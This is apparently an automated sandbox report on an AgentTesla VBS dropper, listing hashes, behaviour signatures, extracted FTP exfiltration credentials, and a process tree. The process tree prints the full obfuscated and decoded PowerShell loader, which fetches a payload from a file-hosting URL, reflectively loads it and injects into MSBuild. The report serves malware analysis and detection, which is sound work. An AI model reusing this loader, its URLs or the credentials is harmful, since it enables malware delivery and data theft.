Analysis

  • max time kernel
    133s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-11-2024 02:16

General

  • Target

    270028765f570ebbb238ee6fb9460d1a674707016d97fc988f772195516ad3ff.vbs

  • Size

    140KB

  • MD5

    cbcf626e71d764c178148e4637e333af

  • SHA1

    c3e2615fea0051e63e817c7ad9cc17b59d6da776

  • SHA256

    270028765f570ebbb238ee6fb9460d1a674707016d97fc988f772195516ad3ff

  • SHA512

    da100c32335caf638e6ccdb0ec37c6e0c6596dfc98b09ef7c39c20911ddadc4576adb67e58187a008be6183bf7cfe89646558bb9abed10374d9e9c5902111fb3

  • SSDEEP

    3072:ky7jgt5pEGwprytIsaK18meFZjcrsmiYADap1Ff:KRQjcQmiMp1Ff

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.stingatoareincendii.ro
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    3.*RYhlG)lkA

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Agenttesla family
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\270028765f570ebbb238ee6fb9460d1a674707016d97fc988f772195516ad3ff.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4936
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoKGdWICcqbURyKicpLm5hbUVbMywxMSwyXS1KT2luJycpKCgnZHZ1aW1hJysnZ2VVcmwgPSBGZ2EnKydodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFVeUhxd3JuWENsS0JKM2o2M0xsMXQyU3RWZ0d4YlN0MCBGZ2E7ZHZ1d2ViQ2xpZW4nKyd0ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtkdnVpbWFnZUJ5dGVzID0gZHZ1d2ViQ2xpZW50LkQnKydvd25sb2FkRGF0YShkdnVpbWFnZVVybCknKyc7JysnZHZ1JysnaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC4nKydHZXRTJysndHJpbmcoZHZ1aW1hZ2VCeXRlJysncyk7ZHZ1c3RhcnRGbGFnID0gRmdhPDxCQVNFNjRfU1RBUlQnKyc+PkZnYTtkdnVlbmRGbGFnID0gRmdhPDxCQVNFNjRfRU5EPj5GZ2E7ZHZ1c3RhcnRJbmRleCA9IGR2dWltYWdlVGV4dC5JbmRleE9mKGR2dXN0YXJ0RmxhZyk7ZHZ1ZW5kSW5kZXggPSBkdnVpbWFnZVRleHQuSW5kZXhPZihkdnVlbmRGbGEnKydnKTtkdnVzdGFydEluZGV4IC1nZSAwIC1hbmQgZHZ1ZW5kSW5kZXggLWd0IGR2dXN0YXJ0SW5kZXg7ZHZ1c3RhcnRJbmRleCArPSBkdnVzdGFydEZsYWcuTCcrJ2VuZ3RoO2R2dWJhc2U2NExlbmd0aCA9IGR2dWVuZEluZGV4IC0gZHZ1c3RhcnRJbmRleDtkdnViYXNlNjRDb21tYW5kID0gZHZ1aW1hZ2VUZXh0LlN1YnN0cmluZyhkdnVzdGFydEluZGV4LCBkdnUnKydiYXNlNjRMZW5ndGgpO2R2dWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGR2dWJhc2U2NENvbW1hbmQuVG9DaGFyQXInKydyYXkoKSBiSFogRm9yRWFjaC1PYmplY3QgeyBkdnVfIH0pWy0xLi4tKGR2dWJhcycrJ2U2NENvbW1hbmQuTGVuZ3RoKV07ZHZ1Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhkdnViYXNlNjRSZXZlcnNlZCk7ZHZ1bG9hZGVkQXNzZScrJ21ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGR2dWNvbW1hbmRCeXRlcyk7ZHZ1dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChGZ2FWQUlGZ2EpO2R2dXZhaU1ldGhvZC5JbnZva2UoZHZ1bnVsbCwgQChGZ2F0eHQub29vb2RlZXZ2di8zODEuMTQyLjk0MS41NC8vOnB0dGhGZ2EsIEZnYScrJ2Rlc2F0aXZhZG9GZ2EsIEZnYWRlc2F0aXZhZG9GZ2EsIEZnYWRlc2F0aXZhZG9GZ2EsIEZnYU1TQnVpbGRGZ2EsICcrJ0ZnYWRlc2F0aXZhZG9GZ2EsIEZnYWRlc2F0aScrJ3ZhZG9GZ2EsRmdhZGVzYXRpJysndmFkb0ZnYSxGJysnZycrJ2FkZXNhdGl2YScrJ2RvRmdhLEZnYWRlc2F0aXZhZG9GZ2EsRmdhZGVzYXRpdmFkb0ZnYSxGZ2FkZXNhdGl2YWRvRmdhLEZnYTFGZ2EsRmdhZGVzYXRpdmFkb0ZnYSkpOycpLnJlcGxBY0UoJ2JIWicsJ3wnKS5yZXBsQWNFKChbY2hhcl0xMDArW2NoYXJdMTE4K1tjaGFyXTExNyksJyQnKS5yZXBsQWNFKCdGZ2EnLFtzdHJpbmddW2NoYXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1132
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((gV '*mDr*').namE[3,11,2]-JOin'')(('dvuima'+'geUrl = Fga'+'https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0 Fga;dvuwebClien'+'t = New-Object System.Net.WebClient;dvuimageBytes = dvuwebClient.D'+'ownloadData(dvuimageUrl)'+';'+'dvu'+'imageText = [System.Text.Encoding]::UTF8.'+'GetS'+'tring(dvuimageByte'+'s);dvustartFlag = Fga<<BASE64_START'+'>>Fga;dvuendFlag = Fga<<BASE64_END>>Fga;dvustartIndex = dvuimageText.IndexOf(dvustartFlag);dvuendIndex = dvuimageText.IndexOf(dvuendFla'+'g);dvustartIndex -ge 0 -and dvuendIndex -gt dvustartIndex;dvustartIndex += dvustartFlag.L'+'ength;dvubase64Length = dvuendIndex - dvustartIndex;dvubase64Command = dvuimageText.Substring(dvustartIndex, dvu'+'base64Length);dvubase64Reversed = -join (dvubase64Command.ToCharAr'+'ray() bHZ ForEach-Object { dvu_ })[-1..-(dvubas'+'e64Command.Length)];dvucommandByt'+'es = [System.Convert]::FromBase64String(dvubase64Reversed);dvuloadedAsse'+'mbly = [System.Reflection.Assembly]::Load(dvucommandBytes);dvuvaiMethod = [dnlib.IO.Home].GetMethod(FgaVAIFga);dvuvaiMethod.Invoke(dvunull, @(Fgatxt.oooodeevvv/381.142.941.54//:ptthFga, Fga'+'desativadoFga, FgadesativadoFga, FgadesativadoFga, FgaMSBuildFga, '+'FgadesativadoFga, Fgadesati'+'vadoFga,Fgadesati'+'vadoFga,F'+'g'+'adesativa'+'doFga,FgadesativadoFga,FgadesativadoFga,FgadesativadoFga,Fga1Fga,FgadesativadoFga));').replAcE('bHZ','|').replAcE(([char]100+[char]118+[char]117),'$').replAcE('Fga',[string][char]39) )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5004
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3612

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    f41839a3fe2888c8b3050197bc9a0a05

    SHA1

    0798941aaf7a53a11ea9ed589752890aee069729

    SHA256

    224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

    SHA512

    2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    3ca1082427d7b2cd417d7c0b7fd95e4e

    SHA1

    b0482ff5b58ffff4f5242d77330b064190f269d3

    SHA256

    31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

    SHA512

    bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kn3apgcv.gre.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1132-12-0x00007FFFD1D30000-0x00007FFFD27F1000-memory.dmp

    Filesize

    10.8MB

  • memory/1132-0-0x00007FFFD1D33000-0x00007FFFD1D35000-memory.dmp

    Filesize

    8KB

  • memory/1132-22-0x00007FFFD1D30000-0x00007FFFD27F1000-memory.dmp

    Filesize

    10.8MB

  • memory/1132-11-0x00007FFFD1D30000-0x00007FFFD27F1000-memory.dmp

    Filesize

    10.8MB

  • memory/1132-6-0x000001D5D2AF0000-0x000001D5D2B12000-memory.dmp

    Filesize

    136KB

  • memory/1132-30-0x00007FFFD1D30000-0x00007FFFD27F1000-memory.dmp

    Filesize

    10.8MB

  • memory/3612-24-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/3612-31-0x0000000005A90000-0x0000000006034000-memory.dmp

    Filesize

    5.6MB

  • memory/3612-32-0x00000000055E0000-0x0000000005646000-memory.dmp

    Filesize

    408KB

  • memory/3612-33-0x00000000068E0000-0x0000000006972000-memory.dmp

    Filesize

    584KB

  • memory/3612-34-0x0000000006980000-0x00000000069D0000-memory.dmp

    Filesize

    320KB

  • memory/3612-35-0x0000000006AD0000-0x0000000006ADA000-memory.dmp

    Filesize

    40KB

  • memory/5004-23-0x0000029A129B0000-0x0000029A12B08000-memory.dmp

    Filesize

    1.3MB